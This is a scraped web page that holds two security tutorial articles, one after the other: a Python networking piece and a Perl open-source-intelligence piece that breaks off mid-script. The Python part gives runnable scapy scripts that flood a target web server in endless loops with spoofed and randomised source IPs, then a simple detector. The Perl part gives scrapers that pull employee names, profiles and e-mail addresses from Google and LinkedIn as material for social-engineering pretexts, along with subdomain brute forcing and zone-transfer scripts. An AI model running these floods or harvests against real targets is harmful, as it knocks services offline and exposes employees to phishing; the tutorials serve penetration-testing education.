struct.unpack(fmt, string): This method unpacks the string according to the given format Let's discuss the code: import struct ms= struct.pack('hhl', 1, 2, 3) print (ms) k= struct.unpack('hhl',ms) print k The output for the preceding code is as follows: G:PythonNetworkingnetwork>python str1.py ☺ ☻ ♥ (1, 2, 3) First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections. Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py. file. The server-side code is as follows: import socket import struct host = "192.168.0.1" port = 12347 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print "connected by", addr msz= struct.pack('hhl', 1, 2, 3) conn.send(msz) conn.close() The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows: import socket import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.0.1" port =12347 s.connect((host,port)) msg= s.recv(1024) print msg print struct.unpack('hhl',msg) s.close() The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows: C:network>python unstruc.py ☺ ☻ ♥ (1, 2, 3) The output for the server-side code is as follows: G:PythonNetworkingprogram>python struct1.py connected by ('192.168.0.11', 1417) Now, you must have a fair idea of how to pack and unpack the data. Format characters We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes. Format C Type Python type Standard size x pad byte no value   c char string of length 1 1 b signed char integer 1 B unsigned char integer 1 ? _Bool bool 1 h short integer 2 H unsigned short integer 2 i int integer 4 I unsigned int integer 4 l long integer 4 L unsigned long integer 4 q long long integer 8 Q unsigned long long integer 8 f float float 4 d double float 8 s char[] string   p char[] string   P void * integer   Let's check what will happen when one value is packed in different formats: >>> import struct >>> struct.pack('b',2) 'x02' >>> struct.pack('B',2) 'x02' >>> struct.pack('h',2) 'x02x00' We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>>  You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:  Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:  Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import *   src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ")   i=1 while True: for srcport in range(1,65535):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    i=i+1 I used the for loop for the ports Let's check the output of the attacker:  Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:  Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ")   i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    loop_break = loop_break+1    i=i+1    if loop_break ==50 :      break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:  Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:  The target machine's output on Wireshark Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True:   pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP):    dict[IP]=dict[IP]+1    print dict[IP]    if(dict[IP]>D_val) and (dict[IP]<D_val1) :        line = "DDOS Detected "      file_txt.writelines(line)      file_txt.writelines(IP)      file_txt.writelines("n")   else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes. Detecting a DDoS attack If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packet that contains port 80 will be allowed. Summary In this article, we learned about penetration testing using Python. Also, we have learned about sniffing using Pyython script and client-side validation as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameter where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a Multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server. Resources for Article: Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]
Read more
  • 0
  • 0
  • 13591

article-image-open-source-intelligence
Packt
30 Dec 2014
30 min read
Save for later

Open Source Intelligence

Packt
30 Dec 2014
30 min read
This article is written by Douglas Berdeaux, the author of Penetration Testing with Perl. Open source intelligence (OSINT) refers to intelligence gathering from open and public sources. These sources include search engines, the client target's web-accessible software or sites, social media sites and forums, Internet routing and naming authorities, public information sites, and more. If done properly and thoroughly, the practice of OSINT can prove to be useful to strengthen social engineering and remote exploitation attacks on our client target as we search for ways to gain access to their systems and buildings during a penetration test. What's covered In this article, we will cover how to gather the information listed using Perl: E-mail addresses from our client target using search engines and social media sites Networking, hosting, routing, and system data of our client target using online resources and simple networking utilities To gather this data, we rely heavily on the LWP::UserAgent Perl module. We will also discover how to use this module with a secured socket layer SSL/TLS (HTTPS) connection. In addition to this, we will learn about a few new Perl modules that are listed here: Net::Whois::Raw Net::DNS::Dig Net::DNS Net::Traceroute XML::LibXML Google dorks Before we use Google for intelligence gathering, we should briefly touch upon using Google dorks, which we can use to refine and filter our Google searches. A Google dork is a string of special syntax that we pass to Google's request handler using the q= option. The dork can comprise operators and keywords separated by a colon and concatenated strings using a plus symbol + as a delimiter. Here is a list of simple Google dorks that we can use to narrow our Google searches: intitle:<string> searches for pages whose HTML title tags contain the string <string> filetype:<ext> searches for files that have the extension <ext> site:<domain> narrows the search to only results that are located on the <domain> target servers inurl:<string> returns results that contain <string> in their URL -<word> negates the word following the minus symbol - in a search filter link:<page> searches for pages that contain the HTML HREF links to the page This is just a small list and a complete guide of Google search operators that can be found on their support servers. A list of well-known exploited Google dorks for information gathering can be found in a Google hacker's database at http://www.exploit-db.com/google-dorks/. E-mail address gathering Getting e-mail addresses from our target can be a rather hard task and can also mean gathering usernames used within the target's domain, remote management systems, databases, workstations, web applications, and much more. As we can imagine, gathering a username is 50 percent of the intrusion for target credential harvesting; the other 50 percent being the password information. So how do we gather e-mail addresses from a target? Well, there are several methods; the first we will look at will be simply using search engines to crawl the web for anything useful, including forum posts, social media, e-mail lists for support, web pages and mailto links, and anything else that was cached or found from ever-spidering search engines. Using Google for e-mail address gathering Automating queries to search engines is usually always best left to application programming interfaces (APIs). We might be able to query the search engine via a simple GET request, but this leaves enough room for error, and the search engine can potentially temporarily block our IP address or force us to validate our humanness using an image of words as it might assume that we are using a bot. Unfortunately, Google only offers a paid version of their general search API. They do, however, offer an API for a custom search, but this is restricted to specified domains. We want to be as thorough as possible and search as much of the web as we can, time permitting, when intelligence gathering. Let's go back to our LWP::UserAgent Perl module and make a simple request to Google, searching for any e-mail addresses and URLs from a given domain. The URLs are useful as they can be spidered to within our application if we feel inclined to extend the reach of our automated OSINT. In the following examples, we want to impersonate a browser as much as possible to not raise flags at Google by using automation. We accomplish this by using the LWP::UserAgent Perl module and spoofing a valid Firefox user agent: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $usage = "Usage ./email_google.pl <domain>"; my $target = shift or die $usage; my $ua = LWP::UserAgent->new; my %emails = (); # unique my $url = 'https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22'.$target.'%22'; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout $ua->show_progress(1); # display progress bar my $res = $ua->get($url); if($res->is_success){ my @urls = split(/url?q=/,$res->as_string); foreach my $gUrl (@urls){ # Google URLs next if($gUrl =~ m/(webcache.googleusercontent)/i or not $gUrl =~ m/^http/); $gUrl =~ s/&amp;sa=U.*//; print $gUrl,"n"; } my @emails = $res->as_string =~ m/[a-z0-9_.-]+@/ig; foreach my $email (@emails){ if(not exists $emails{$email}){    print "Possible Email Match: ",$email,$target,"n";    $emails{$email} = 1; # hashes are faster } } } else{ die $res->status_line; } The LWP::UserAgent module used in the previous code is not new to us. We did, however, add SSL support using the LWP::Protocol::https module. Our URL $url object is a simple Google search URL that anyone would browse to with a normal browser. The num= value pertains the returned results from Google in a single page, which we have set to 100. To also act as a browser, we needed to set the user agent with the agent() method, which we did as a Mozilla browser. After this, we set a timeout and Boolean to show a simple progress bar. The rest is just simple Perl string manipulation and pattern matching. We use the regular expression url?q= to split the string returned by the as_string method from the $res object. Then, for each URL string, we use another regular expression, &amp;sa=U.*, to remove excess analytic garbage that Google adds. Then, we simply parse out all e-mail addresses found using the same method but different regexp. We stuff all matches into the @emails array and loop over them, displaying them to our screen if they don't exist in the $emails{} Perl hash. Let's run this program against the weaknetlabs.com domain and analyze the output: root@wnld960:~# perl email_google.pl weaknetlabs.com ** GET https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22weaknetlabs.com%22 ==> 200 OK (1s) http://weaknetlabs.com/ http://weaknetlabs.com/main/%3Fpage_id%3D479 … http://www.securitytube.net/video/2039 Possible Email Match: Douglas@weaknetlabs.com Possible Email Match: weaknetlabs@weaknetlabs.com root@wnld960:~# This is the (trimmed) output when we run an automated Google search for an e-mail address from weaknetlabs.com. Using social media for e-mail address gathering Now, let's turn our attention to using social media sites such as Google+, LinkedIn, and Facebook to try to gather e-mail addresses using Perl. Social media sites can sometimes reflect information about an employee's attitude towards their employer, their status within the company, position, e-mail addresses, and more. All of this information is considered OSINT and can be useful when advancing our attacks. Google+ We can also search plus.google.com for contact information from users belonging to our target. The following is the URL-encoded Google dork we will use to search the Google+ profiles for an employee of our target: intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com The URL-encoded symbols are as follows: %3A: This is a colon, that is, : %2B: This is a plus symbol, that is, + The plus symbol + is a special component of Google dork, as we mentioned in the previous section. The intitle keyword tells Google to display results whose HTML <title> tag contains the About – Google+ text. Then, we add the string (in quotations) "Works at " (notice the space at the end), and then the target name as the string object $target. The site keyword tells the Google search engine to only display results from the plus.google.com site. Let's implement this in our Perl program and see what results are returned for Google employees: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $ua = LWP::UserAgent->new; my $usage = "Usage ./googleplus.pl <target name>"; my $target = shift or die $usage; $target =~ s/s/+/g; my $gUrl = 'https://www.google.com/search?safe=off&noj=1&sclient=psy-ab&q=intitle%3A"About+-+Google%2B"+"Works+at+' .$target.'"+site%3Aplus.google.com&oq=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com'; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout my $res = $ua->get($gUrl); if($res->is_success){ foreach my $string (split(/url?q=/,$res->as_string)){ next if($string =~ m/(webcache.googleusercontent)/i or not $string =~ m/^http/); $string =~ s/&amp;sa=U.*//; print $string,"n"; } } else{ die $res->status_line; } This Perl program is quite similar to our last search program. Now, let's run this to find possible Google employees. Since a target client company can have spaces in its name, we accommodate them by encoding them for Google as plus symbols: root@wnld960:~# perl googleplus.pl google https://plus.google.com/%2BPaulWilcox/about https://plus.google.com/%2BNatalieVillalobos/about ... https://plus.google.com/%2BAndrewGerrand/about root@wnld960:~# The preceding (trimmed) output proves that our Perl script works as we browse to the returned results. These two Google search scripts provided us with some great information quickly. Let's move on to another example, not using Google but LinkedIn, a social media site for professionals. LinkedIn LinkedIn can provide us with the contact information and IT skill levels of our client target during a penetration test. Here, we will focus on the contact information. By now, we should feel very comfortable making any type of web request using LWP::UserAgent and parsing its output for intelligence data. In fact, this LinkedIn example should be a breeze. The trick is fine-tuning our filters and regular expressions to get only relevant data. Let's just dive right into the code and then analyze some sample output: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $ua = LWP::UserAgent->new; my $usage = "Usage ./googlepluslinkedin.pl <target name>"; my $target = shift or die $usage; my $gUrl = 'https://www.google.com/search?q=site:linkedin.com+%22at+'.$target.'%22'; my %lTargets = (); # unique $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout my $google = getUrl($gUrl); # one and ONLY call to Google foreach my $title ($google =~ m/shref="/url?.*">[a-z0-9_. -]+s?.b.at $target..b.s-slinked/ig){ my $lRurl = $title; $title =~ s/.*">([^<]+).*/$1/; $lRurl =~ s/.*url?.*q=(.*)&amp;sa.*/$1/; print $title,"-> ".$lRurl."n"; my @ln = split(/15?12/,getUrl($lRurl)); foreach(@ln){ if(m/title="/i){    my $link = $_;    $link =~ s/.*href="([^"]+)".*/$1/;    next if exists $lTargets{$link};    $lTargets{$link} = 1;    my $name = $_;    $name =~ s/.*title="([^"]+)".*/$1/;    print "t",$name," : ",$link,"n"; } } } sub getUrl{ sleep 1; # pause... my $res = $ua->get(shift); if($res->is_success){ return $res->as_string; }else{ die $res->status_line; } } The preceding Perl program makes one query to Google to find all possible positions from the target; for each position found, it queries LinkedIn to find employees of the target. The regular expressions used were finely crafted after inspection of the returned HTML object from a simple query to both Google and LinkedIn. This is a great example of how we can spider off from our initial Google results to gather even more intelligence using Perl automation. Let's take a look at some sample outputs from this program when used against Walmart.com: root@wnld960:~# perl linkedIn.pl Walmart Buyer : http://www.linkedin.com/title/buyer/at-walmart/        Jason Kloster : http://www.linkedin.com/in/jasonkloster       Rajiv Ahirwal : http://www.linkedin.com/in/rajivahirwal ... Store manager : http://www.linkedin.com/title/store%2Bmanager/at-walmart/        Benjamin Hunt 13k+ (LION) #1 Connected Leader at Walmart : http://www.linkedin.com/in/benjaminhunt01 ... Shift manager : http://www.linkedin.com/title/shift%2Bmanager/at-walmart/        Frank Burns : http://www.linkedin.com/pub/frank-burns/24/83b/285 ... Assistant store manager : http://www.linkedin.com/title/assistant%2Bstore%2Bmanager/at-walmart/        John Cole : http://www.linkedin.com/pub/john-cole/67/392/b39        Crystal Herrera : http://www.linkedin.com/pub/crystal-herrera/92/74a/97b root@wnld960:~# The preceding (trimmed) output provided some great insight into employee positions, and even real employees in those positions of the target, with a simple call to one script. All of this information is publicly available information and we are not directly attacking Walmart or its employees; we are just using this as an example of intelligence-gathering techniques during a penetration test using Perl programming. This information can further be used for reporting, and we can even extend this data into other areas of research. For instance, we can easily follow the LinkedIn links with LWP::UserAgent and pull even more data from the publicly available LinkedIn profiles. This data, when compared to Google+ profile data and simple Google searches, should help in providing a background to create a more believable pretext for social engineering. Now, let's see if we can use Google to search more social media websites for information on our client target. Facebook We can easily argue that Facebook is one of the largest social networking sites around during the writing of this book. Facebook can easily return a large amount of data about a person, and we don't even have to go to the site to get it! We can easily extend our reach into the Web with the gathered employee names, from our previous code, by searching Google using the site:faceboook.com parameter and the exact same syntax as from the first example in the Google section of the E-mail address gathering section. The following are a few simple Google dorks that can possibly reveal information about our client target: site:facebook.com "manager at target" site:facebook.com "ceo at target" site:facebook.com "owner of target" site:facebook.com "experience at target" This information can return customer and employee criticism that can be used for a wide array of penetration-testing purposes, including social engineering pretexting. We can narrow our focus even further by adding other keywords and strings from our previously gathered intelligence, such as city names, company names, and more. Just about anything returned can be compiled into a unique wordlist for password cracking, and contrasted with the known data with Digital Credential Analysis (DCA). Domain Name Services Domain Name Services (DNS) are used to translate IP addresses into hostnames so that we can use alphanumeric addresses instead of IP addresses for websites or services. It makes our lives a lot easier when typing in a URL with a name rather than a 4-byte numerical value. Any client target can potentially have full control over their naming services. DNS A records can be assigned to any IP address. We can easily write our own record with domain control for an IPv4 class A address, such as 10.0.0.1, which is commonly done for an internal network to allow its users to easily connect to different internal services. The Whois query Sometimes, when we can get an IP address for a client target, we can pass this IP address to the Whois database, and in return, we can get a range of IP addresses in which our IP lies and the organization that owns the range. If the organization is our target, then we now know a range of IP addresses pointing directly to their resources. Usually, this information is given during a penetration test, and the limitations on the lengths that we are allowed to go to for IP ranges are set so that we can be limited simply to reporting. Let's use Perl and the Net::Whois::Raw module to interact with the American Registry for Internet Numbers (ARIN) database for an IP address: #!/usr/bin/perl -w use strict; use Net::Whois::Raw; die "Usage: perl netRange.pl <IP Address>" unless $ARGV[0]; foreach(split(/n/,whois(shift))){ print $_,"n" if(m/^(netrange|orgname)/i); } The preceding code, when run, should produce information about the network range and organization name that owns the range. It is very simple, and it can be compared to calling the whois program form the Linux command line. If we were to script this to run through a number of different IP addresses and run the Whois query against each one, we could be violating the terms of service set by ARIN. Let's test it and see what we get with a random IP address: root@wnld960:~# perl whois.pl 198.123.2.22 NetRange:       198.116.0.0 - 198.123.255.255 OrgName:       National Aeronautics and Space Administration root@wnld960:~# This is the output from our Perl program, which reveals an IP range that can belong to the organization listed. If this fails, and we need to find more than one hostname owned by our client target, we can try a brute force method that simply checks our name servers; we will do just that in the next section. The DIG query DIG stands for domain information groper and is a utility to do just that using DNS queries. The DIG Linux utility has actually replaced the older host and nslookup. In making these queries, one thing to note is that when we don't specify a name server to use, the DIG utility will simply use the Linux OS default resolver. We can, however, pass a name server to DIG; we will cover this in the upcoming section, Zone transfers. There is a nice object-oriented Perl module for DIG that we will examine, which is called Net::DNS::Dig. Let's quickly look at an example to query our DNS with this module: #!/usr/bin/perl -w use Net::DNS::Dig; use strict; my $dig = new Net::DNS::Dig(); my $dom = shift or die "Usage: perl dig.pl <domain>"; my $dobj = $dig->for($dom, 'A'); # print $dobj->sprintf; # print entire dig query response print "CODE: ",$dobj->rcode(1),"n"; # Dig Response Code my %mx = Net::DNS::Dig->new()->for($dom,'MX')->rdata(); while(my($val,$server) = each(%mx)){ print "MX: ",$server," - ",$val,"n"; } The preceding code is simple. We create a DIG object $dig and call the for() method, passing the domain name we pulled by shifting the command-line arguments and types for A records. We print the returned response with sprintf(), and then the response code alone with the rcode() method. Finally, we create a hash object %mx from the rdata() method. We pass the rdata() object returned from making a new Net::DNS::Dig object, and call the for() method on it with a type of MX for the mail server. Let's try this against a domain and see what is returned: root@wnld960:~# perl dig.pl weaknetlabs.com ; <<>> Net::DNS::Dig 0.12 <<>> -t a weaknetlabs.com. ;; ;; Got answer. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34071 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;weaknetlabs.com.               IN     A ;; ANSWER SECTION: weaknetlabs.com.       300    IN     A       198.144.36.192 ;; Query time: 118 ms ;; SERVER: 75.75.76.76# 53(75.75.76.76) ;; WHEN: Mon May 19 18:26:31 2014 ;; MSG SIZE rcvd: 49 -- XFR size: 2 records CODE: NOERROR MX: mailstore1.secureserver.net - 10 MX: smtp.secureserver.net – 0 The output is just as expected. Everything above the line starting with CODE is the response from making the DIG query. CODE is returned from the rcode() method. Since we passed a true value to rcode(), we got a string type, NOERROR, returned. Next, we printed the key and value pairs of the %mx Perl hash, which displayed our target's e-mail server names. Brute force enumeration Keeping the previous lesson in mind, and knowing that Linux offers a great wealth of networking utilities, we might be inclined to write our own DNS brute force tool to enumerate any possible A records that our client target could have made prior to our penetration test. Let's take a quick look at the nslookup utility we can use to check if a record exists: trevelyn@wnld960:~$ nslookup admin.warcarrier.org Server:         75.75.76.76 Address:       75.75.76.76#53 Non-authoritative answer: Name:   admin.warcarrier.org Address: 10.0.0.1 trevelyn@wnld960:~$ nslookup admindoesntexist.warcarrier.org Server:         75.75.76.76 Address:        75.75.76.76#53 ** server can't find admindoesntexist.warcarrier.org: NXDOMAIN trevelyn@wnld960:~$ This is the output of two calls to nslookup, the networking utility used for returning IP addresses of hostnames, and vice versa. The first A record check was successful, and the second, the admindoesntexist subdomain, was not. We can easily see from the output of this program how we can parse it to check whether the subdomain exists. We can also see from the two subdomains that we can use a simple word list of commonly used subdomains for efficiency, before trying many possible combinations. A lot of intelligence gathering might have already been done for you by search engines such as Google. In fact, the keyword search site: can return more than just the www subdomains. If we broaden our num= URL GET parameter and loop through all possible results by incrementing the start= parameter, we can potentially get results from other subdomains of our target. Now that we have seen the basic query for a subdomain, let's turn our focus to use Perl and a new Perl module, Net::DNS, to enumerate a few subdomains: #!/usr/bin/perl -w use strict; use Net::DNS; my $dns = Net::DNS::Resolver->new; my @subDomains = ("admin","admindoesntexist","www","mail","download","gateway"); my $usage = "perl domainbf.pl <domain name>"; my $domain = shift or die $usage; my $total = 0; dns($_) foreach(@subDomains); print $total," records testedn"; sub dns{ # search sub domains: $total++; # record count my $hn = shift.".".$domain; # construct hostname my $dnsLookup = $dns->search($hn); if($dnsLookup){ # successful lookup my $t=0; foreach my $ip ($dnsLookup->answer){    return unless $ip->type eq "A" and $t<1; # A records    print $hn,": ",$ip->address,"n"; # just the IP    $t++; } } return; } The preceding Perl program loops through the @domains array and calls the dns() subroutine on each, which returns or prints a successful query. The $t integer token is used for subdomains, which has several identical records to avoid repetition in the program's output. After this, we simply print the total of the records tested. This program can be easily modified to open a word list file, and we can loop through each by passing them to the dns() subroutine, with something similar to the following: open(FLE,"file.txt"); while(<FLE>){ dns($_); } Zone transfers As we have seen with an A record, the admin.warcarrier.org entry provided us with some insight as to the IP range of the internal network, or the class A address 10.0.0.1. Sometimes, when a client target is controlling and hosting their own name servers, they accidentally allow DNS zone transfers from their name servers into public name servers, providing the attacker with information where the target's resources are. Let's use the Linux host utility to check for a DNS zone transfer: [trevelyn@shell ~]$ host -la warcarrier.org beth.ns.cloudflare.com Trying "warcarrier.org" Using domain server: Name: beth.ns.cloudflare.com Address: 2400:cb00:2049:1::adf5:3a67#53 Aliases: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20461 ;; flags: qr aa; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ; warcarrier.org.           IN     AXFR ;; ANSWER SECTION: warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800 warcarrier.org.     300     IN     NS     beth.ns.cloudflare.com. warcarrier.org.     300     IN     NS     hank.ns.cloudflare.com. warcarrier.org.     300     IN     A      50.97.177.66 admin.warcarrier.org. 300     IN     A       10.0.0.1 gateway.warcarrier.org. 300 IN   A       10.0.0.124 remote.warcarrier.org. 300     IN     A       10.0.0.15 partner.warcarrier.org. 300 IN   CNAME   warcarrier.weaknetlabs.com. calendar.warcarrier.org. 300 IN   CNAME   login.secureserver.net. direct.warcarrier.org. 300 IN   CNAME   warcarrier.org. warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800 Received 401 bytes from 2400:cb00:2049:1::adf5:3a67#53 in 56 ms [trevelyn@shell ~]$ As we see from the output of the host command, we have found a successful DNS zone transfer, which provided us with even more hostnames used by our client target. This attack has provided us with a few CNAME records, which are used as aliases to other servers owned or used by our target, the subnet (class A) IP addresses used by the target, and even the name servers used. We can also see that the default name, direct, used by CloudFlare.com is still set for the cloud service to allow connections directly to the IP of warcarrier.org, which we can use to bypass the cloud service. The host command requires the name server, in our case beth.ns.cloudflare.com, before performing the transfer. What this means for us is that we will need the name server information before querying for a potential DNS zone transfer in our Perl programs. Let's see how we can use Net::DNS for the entire process: #!/usr/bin/perl -w use strict; use Net::DNS; my $usage = "perl dnsZt.pl <domain name>"; die $usage unless my $dom = shift; my $res = Net::DNS::Resolver->new; # dns object my $query = $res->query($dom,"NS"); # query method call for nameservers if($query){ # query of NS was successful foreach my $rr (grep{$_->type eq 'NS'} $query->answer){ $res->nameservers($rr->nsdname); # set the name server print "[>] Testing NS Server: ".$rr->nsdname."n"; my @subdomains = $res->axfr($dom); if ($#subdomains > 0){    print "[!] Successful zone transfer:n";    foreach (@subdomains){    print $_->name."n"; # returns a 